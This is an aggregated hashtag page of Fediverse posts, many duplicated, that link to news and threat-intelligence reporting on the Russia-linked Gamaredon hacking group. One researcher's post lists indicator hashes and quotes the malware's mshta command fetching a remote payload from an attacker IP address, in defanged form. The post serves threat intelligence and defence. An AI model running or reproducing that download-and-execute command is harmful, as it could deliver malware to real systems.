home.social

#gamaredon — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #gamaredon, aggregated by home.social.

  1. The Threat Codex @[email protected] ·

    Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088
    #CVE_2025_8088 #RomComGroup #APT44 #TEMP.Armageddon #Gamaredon #Turla #zeroplayer
    cloud.google.com/blog/topics/t

    #cve_2025_8088 #romcomgroup #apt44 #temp #gamaredon #turla
  2. The Threat Codex @[email protected] ·

    Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088
    #CVE_2025_8088 #RomComGroup #APT44 #TEMP.Armageddon #Gamaredon #Turla #zeroplayer
    cloud.google.com/blog/topics/t

    #cve_2025_8088 #romcomgroup #apt44 #temp #gamaredon #turla
  3. The Threat Codex @[email protected] ·

    Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088
    #CVE_2025_8088 #RomComGroup #APT44 #TEMP.Armageddon #Gamaredon #Turla #zeroplayer
    cloud.google.com/blog/topics/t

    #cve_2025_8088 #romcomgroup #apt44 #temp #gamaredon #turla
  4. The Threat Codex @[email protected] ·

    Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088
    #CVE_2025_8088 #RomComGroup #APT44 #TEMP.Armageddon #Gamaredon #Turla #zeroplayer
    cloud.google.com/blog/topics/t

    #zeroplayer #turla #gamaredon #temp #apt44 #romcomgroup
  5. The Threat Codex @[email protected] ·

    Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088
    #CVE_2025_8088 #RomComGroup #APT44 #TEMP.Armageddon #Gamaredon #Turla #zeroplayer
    cloud.google.com/blog/topics/t

    #cve_2025_8088 #romcomgroup #apt44 #temp #gamaredon #turla
  6. The Threat Codex @[email protected] ·

    Gamaredon: Now Downloading via Windows Updates Best Friend “BITS”
    #Gamaredon
    blog.synapticsystems.de/gamare

    #gamaredon
  7. The Ukrainian Tribune @[email protected] ·

    Two of the world’s most prolific state-linked #cybercrime groups — #russia’s #Gamaredon and #NKorea’s #Lazarus collective — have been spotted sharing resources.

    Experts found overlapping #tactics and shared #infrastructure between the two groups.

    politico.eu/article/russia-nor

    #cybercrime #russia #gamaredon #nkorea #lazarus #tactics
  8. IT News @[email protected] ·

    Two of the Kremlin’s most active hack groups are collaborating, ESET says - Two of the Kremlin’s most active hacking units recently were... - arstechnica.com/security/2025/ #advancedpersistentthreat #gamaredon #security #biz#russia #turla #apt

    #advancedpersistentthreat #gamaredon #security #biz #russia #turla
  9. IT News @[email protected] ·

    Two of the Kremlin’s most active hack groups are collaborating, ESET says - Two of the Kremlin’s most active hacking units recently were... - arstechnica.com/security/2025/ #advancedpersistentthreat #gamaredon #security #biz#russia #turla #apt

    #advancedpersistentthreat #gamaredon #security #biz #russia #turla
  10. IT News @[email protected] ·

    Two of the Kremlin’s most active hack groups are collaborating, ESET says - Two of the Kremlin’s most active hacking units recently were... - arstechnica.com/security/2025/ #advancedpersistentthreat #gamaredon #security #biz#russia #turla #apt

    #advancedpersistentthreat #gamaredon #security #biz #russia #turla
  11. IT News @[email protected] ·

    Two of the Kremlin’s most active hack groups are collaborating, ESET says - Two of the Kremlin’s most active hacking units recently were... - arstechnica.com/security/2025/ #advancedpersistentthreat #gamaredon #security #biz#russia #turla #apt

    #apt #turla #russia #biz #security #gamaredon
  12. IT News @[email protected] ·

    Two of the Kremlin’s most active hack groups are collaborating, ESET says - Two of the Kremlin’s most active hacking units recently were... - arstechnica.com/security/2025/ #advancedpersistentthreat #gamaredon #security #biz#russia #turla #apt

    #advancedpersistentthreat #gamaredon #security #biz #russia #turla
  13. Pyrzout :vm: @[email protected] ·

    Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions securityweek.com/turla-and-gam #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla

    #malware #gamaredon #ukraine #russia #turla
  14. Pyrzout :vm: @[email protected] ·

    Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions securityweek.com/turla-and-gam #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla

    #malware #gamaredon #ukraine #russia #turla
  15. Pyrzout :vm: @[email protected] ·

    Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions securityweek.com/turla-and-gam #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla

    #turla #russia #ukraine #gamaredon #malware
  16. Pyrzout :vm: @[email protected] ·

    Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions securityweek.com/turla-and-gam #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla

    #malware #gamaredon #ukraine #russia #turla
  17. Pyrzout :vm: @[email protected] ·

    Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions securityweek.com/turla-and-gam #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla

    #malware #gamaredon #ukraine #russia #turla
  18. Pyrzout :vm: @[email protected] ·

    Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions securityweek.com/turla-and-gam #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla

    #malware #gamaredon #ukraine #russia #turla
  19. Pyrzout :vm: @[email protected] ·

    Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions securityweek.com/turla-and-gam #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla

    #turla #russia #ukraine #gamaredon #malware
  20. Pyrzout :vm: @[email protected] ·

    Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions securityweek.com/turla-and-gam #Malware&Threats #Gamaredon #malware #Ukraine #Russia #Turla

    #malware #gamaredon #ukraine #russia #turla
  21. PrivacyDigest @[email protected] ·

    #Gamaredon : The Turncoat #Spies Relentlessly #Hacking #Ukraine

    For the past decade, this group of #FSB #hackers—including “traitor” #Ukrainian intelligence officers—has used a grinding barrage of #intrusion campaigns to make life hell for their former countrymen and #cybersecurity defenders.
    #security #privacy

    wired.com/story/gamaredon-turn

    #privacy #security #cybersecurity #intrusion #ukrainian #hackers
  22. Pyrzout :vm: @[email protected] ·

    Gamaredon targeted the military mission of a Western country based in Ukraine – Source: securityaffairs.com ciso2ciso.com/gamaredon-target #rssfeedpostgeneratorecho #informationsecuritynews #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #BreakingNews #Cyberwarfare #Intelligence #SecurityNews #hackingnews #Gamaredon #hacking #ukraine #Russia #APT

    #rssfeedpostgeneratorecho #informationsecuritynews #securityaffairscom #cybersecuritynews #pierluigipaganini #securityaffairs
  23. Pyrzout :vm: @[email protected] ·

    Gamaredon Uses Infected Removable Drives to Breach Western Military Mission in Ukraine – Source:thehackernews.com ciso2ciso.com/gamaredon-uses-i #rssfeedpostgeneratorecho #CyberSecurityNews #TheHackerNews #Gamaredon

    #rssfeedpostgeneratorecho #cybersecuritynews #thehackernews #gamaredon
  24. The Threat Codex @[email protected] ·

    State-Sponsored Tactics: How Gamaredon and ShadowPad Operate and Rotate Their Infrastructure
    #Gamaredon #RedFoxtrot #ShadowPad
    hunt.io/blog/state-sponsored-a

    #gamaredon #redfoxtrot #shadowpad
  25. The Threat Codex @[email protected] ·

    State-Sponsored Tactics: How Gamaredon and ShadowPad Operate and Rotate Their Infrastructure
    #Gamaredon #RedFoxtrot #ShadowPad
    hunt.io/blog/state-sponsored-a

    #gamaredon #redfoxtrot #shadowpad
  26. The Threat Codex @[email protected] ·

    State-Sponsored Tactics: How Gamaredon and ShadowPad Operate and Rotate Their Infrastructure
    #Gamaredon #RedFoxtrot #ShadowPad
    hunt.io/blog/state-sponsored-a

    #gamaredon #redfoxtrot #shadowpad
  27. The Threat Codex @[email protected] ·

    State-Sponsored Tactics: How Gamaredon and ShadowPad Operate and Rotate Their Infrastructure
    #Gamaredon #RedFoxtrot #ShadowPad
    hunt.io/blog/state-sponsored-a

    #shadowpad #redfoxtrot #gamaredon
  28. SOC Prime @[email protected] ·

    The russia-backed #Gamaredon group targets Ukraine once again in the ongoing campaign that employs DLL sideloading and exploits LNK files to spread #Remcos backdoor. Detect related #APT attacks with #Sigma rules from SOC Prime Platform.
    socprime.com/blog/gamaredon-ca

    #gamaredon #remcos #apt #sigma
  29. Pyrzout :vm: @[email protected] ·

    Gamaredon Campaign Detection: russia-backed APT Group Targets Ukraine Using LNK Files to Spread Remcos Backdoor – Source: socprime.com ciso2ciso.com/gamaredon-campai #rssfeedpostgeneratorecho #CyberSecurityNews #Latestthreats #socprimecom #Gamaredon #Phishing #socprime #Remcos #Blog #APT

    #rssfeedpostgeneratorecho #cybersecuritynews #latestthreats #socprimecom #gamaredon #phishing
  30. Pyrzout :vm: @[email protected] ·

    Russia-linked Gamaredon targets Ukraine with Remcos RAT – Source: securityaffairs.com ciso2ciso.com/russia-linked-ga #rssfeedpostgeneratorecho #informationsecuritynews #ITInformationSecurity #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #BreakingNews #Cyberwarfare #SecurityNews #hackingnews #Cybercrime #Gamaredon #RemcosRAT #hacking #Malware #ukraine #Russia

    #rssfeedpostgeneratorecho #informationsecuritynews #itinformationsecurity #securityaffairscom #cybersecuritynews #pierluigipaganini
  31. The Threat Codex @[email protected] ·

    Gamaredon campaign abuses LNK files to distribute Remcos backdoor
    #Gamaredon #Remcos
    blog.talosintelligence.com/gam

    #gamaredon #remcos
  32. Pyrzout :vm: @[email protected] ·

    GamaCopy targets Russia mimicking Russia-linked Gamaredon APT – Source: securityaffairs.com ciso2ciso.com/gamacopy-targets #rssfeedpostgeneratorecho #informationsecuritynews #ITInformationSecurity #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #BreakingNews #SecurityNews #GamaCopyAPT #hackingnews #Gamaredon #hacking #Malware #APT

    #rssfeedpostgeneratorecho #informationsecuritynews #itinformationsecurity #securityaffairscom #cybersecuritynews #pierluigipaganini
  33. The Threat Codex @[email protected] ·

    The Russian APT Tool Matrix
    #CozyBear #FancyBear #BerserkBear #EMBERBEAR #Sandworm #Gamaredon #Turla
    blog.bushidotoken.net/2024/09/

    #cozybear #fancybear #berserkbear #emberbear #sandworm #gamaredon
  34. Richi Jennings @[email protected] ·

    Flash drive sharing #malware escapes Україна. #Gamaredon fingered as perps.

    A worm spread by sharing #USB drives is breaking free, outside of its primary target. An #APT group tied to the Russian #FSB is said to be responsible—apparently it’s part of #Putin’s #cyberwar against #Ukraine.

    #LitterDrifter is at least easily detected and blocked. In today’s #SBBlogwatch, we give thanks for small mercies. At @TechstrongGroup’s @SecurityBlvd: securityboulevard.com/2023/11/

    #malware #gamaredon #usb #apt #fsb #putin
  35. Richi Jennings @[email protected] ·

    Flash drive sharing #malware escapes Україна. #Gamaredon fingered as perps.

    A worm spread by sharing #USB drives is breaking free, outside of its primary target. An #APT group tied to the Russian #FSB is said to be responsible—apparently it’s part of #Putin’s #cyberwar against #Ukraine.

    #LitterDrifter is at least easily detected and blocked. In today’s #SBBlogwatch, we give thanks for small mercies. At @TechstrongGroup’s @SecurityBlvd: securityboulevard.com/2023/11/

    #malware #gamaredon #usb #apt #fsb #putin
  36. Richi Jennings @[email protected] ·

    Flash drive sharing #malware escapes Україна. #Gamaredon fingered as perps.

    A worm spread by sharing #USB drives is breaking free, outside of its primary target. An #APT group tied to the Russian #FSB is said to be responsible—apparently it’s part of #Putin’s #cyberwar against #Ukraine.

    #LitterDrifter is at least easily detected and blocked. In today’s #SBBlogwatch, we give thanks for small mercies. At @TechstrongGroup’s @SecurityBlvd: securityboulevard.com/2023/11/

    #malware #gamaredon #usb #apt #fsb #putin
  37. Richi Jennings @[email protected] ·

    Flash drive sharing #malware escapes Україна. #Gamaredon fingered as perps.

    A worm spread by sharing #USB drives is breaking free, outside of its primary target. An #APT group tied to the Russian #FSB is said to be responsible—apparently it’s part of #Putin’s #cyberwar against #Ukraine.

    #LitterDrifter is at least easily detected and blocked. In today’s #SBBlogwatch, we give thanks for small mercies. At @TechstrongGroup’s @SecurityBlvd: securityboulevard.com/2023/11/

    #sbblogwatch #litterdrifter #ukraine #cyberwar #putin #fsb
  38. Richi Jennings @[email protected] ·

    Flash drive sharing #malware escapes Україна. #Gamaredon fingered as perps.

    A worm spread by sharing #USB drives is breaking free, outside of its primary target. An #APT group tied to the Russian #FSB is said to be responsible—apparently it’s part of #Putin’s #cyberwar against #Ukraine.

    #LitterDrifter is at least easily detected and blocked. In today’s #SBBlogwatch, we give thanks for small mercies. At @TechstrongGroup’s @SecurityBlvd: securityboulevard.com/2023/11/

    #malware #gamaredon #usb #apt #fsb #putin
  39. IT News @[email protected] ·

    USB worm unleashed by Russian state hackers spreads worldwide - Enlarge (credit: Getty Images)

    A group of Russian-state hacker... - arstechnica.com/?p=1985993 #gamaredon #security #kremlin #biz#russia #worm #usb

    #usb #worm #russia #biz #kremlin #security
  40. Pyrzout :vm: @[email protected] ·

    Russian APT Gamaredon uses USB worm LitterDrifter against Ukraine – Source: securityaffairs.com ciso2ciso.com/russian-apt-gama #rssfeedpostgeneratorecho #informationsecuritynews #ITInformationSecurity #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #LitterDrifter #BreakingNews #Intelligence #SecurityNews #hackingnews #Gamaredon #hacking #Malware #ukraine #Russia #worm

    #rssfeedpostgeneratorecho #informationsecuritynews #itinformationsecurity #securityaffairscom #cybersecuritynews #pierluigipaganini
  41. Pyrzout :vm: @[email protected] ·

    Russian APT Gamaredon uses USB worm LitterDrifter against Ukraine – Source: securityaffairs.com ciso2ciso.com/russian-apt-gama #rssfeedpostgeneratorecho #informationsecuritynews #ITInformationSecurity #SecurityAffairscom #CyberSecurityNews #PierluigiPaganini #SecurityAffairs #SecurityAffairs #LitterDrifter #BreakingNews #Intelligence #SecurityNews #hackingnews #Gamaredon #hacking #Malware #ukraine #Russia #worm

    #worm #russia #ukraine #malware #hacking #gamaredon
  42. Dmitry Bestuzhev @[email protected] ·

    A very fresh #Gamaredon TA sample from today (Jan 23, 2022) targeting the Directorate General For Rendering Services To Diplomatic Missions of #Ukraine:

    Original email: afb612d08112c036628a29ed8d4bd4550ca7cfed2582e2f432f2283a9b507f15

    Attachment:
    d124919de870b5974639ba24dd80709ed890119bdec4ba6a6179464fca4ef952 *Запит.tar

    Extracted malicious LNK:
    600ef7861ad03b434d98312a4133dc33fa1944f43c2e558044dfcdb342803147 *Відповідно_до_статті_20_Закону,_просимо_надати_відповідь_протягом_5_робочих_днів_з_дня_отримання_запиту.lnk
    dropping a next stage #vbscript via #mshta

    %windir%\system32\mshta[.]exe http://194.180.174[.]203/23.01/mo/baseball[.]DjVu

    284bd873c840415ee24738f0a866b558d51f5f58b6bf29fb2818ffb819f9bd04 *baseball.DjVu

    Once deobfuscated it leads to a #Telegram channel providing with the next state IP:
    b7422446c22baee16c6c9c00a82610f739b836648ffce070bbd6c932db5416f5 *baseball.DjVu.deobfuscated

    We have a full paper of this Telegram multi-staging technique published last week here: blogs.blackberry.com/en/2023/0

    #gamaredon #ukraine #vbscript #mshta #telegram
  43. Tarnkappe.info @[email protected] ·

    📬 Ukraine warnt vor Cyber-Angriffen auf den Telegram-Messenger
    #Hacking #Armageddon #Gamaredon #Phishing #Telegram #Ukraine #UkraineCyber​​Police tarnkappe.info/artikel/hacking

    #ukrainecyber #ukraine #telegram #phishing #gamaredon #armageddon
  44. SecurityLab @[email protected] ·

    СНБО считает что спецслужбы России готовят атаку на Украину #хакер, #Украина, #Россия, #спецслужбы, #Gamaredon, #InvisiMole securitylab.ru/news/511326.php twitter.com/SecurityLabnews/st

    #invisimole #gamaredon #спецслужбы #россия #украина #хакер